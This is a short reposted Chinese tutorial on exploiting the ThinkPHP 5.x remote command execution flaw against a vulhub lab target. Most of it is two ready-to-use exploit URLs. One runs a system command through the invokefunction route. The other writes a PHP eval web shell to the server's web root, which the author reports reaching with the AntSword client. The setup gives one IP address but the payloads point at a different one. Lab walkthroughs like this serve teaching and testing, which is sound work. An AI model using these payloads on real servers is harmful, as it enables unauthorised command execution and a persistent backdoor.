Thinkphp(TP)框架漏洞攻略

2025/11/12 3:01:36 来源：https://blog.csdn.net/2301_78554096/article/details/146487343 浏览: 次关键词：Thinkphp(TP)框架漏洞攻略

Thinkphp5x远程命令执⾏及getshell

环境配置

云服务器：121.40.229.129:8080

靶场：vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场：http://121.40.229.129:8080/

远程命令执⾏

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

根⽬录⽣成11.php ⽂件

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval(\$_POST[cmd]);?%3E%22%20%3E11.php

使用蚁剑连接成功

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com

Thinkphp(TP)框架漏洞攻略

Thinkphp5x远程命令执⾏及getshell

环境配置

访问靶场：http://121.40.229.129:8080/

远程命令执⾏

根⽬录⽣成11.php ⽂件

使用蚁剑连接成功

相关资讯

热文排行

最新新闻

推荐新闻

热搜词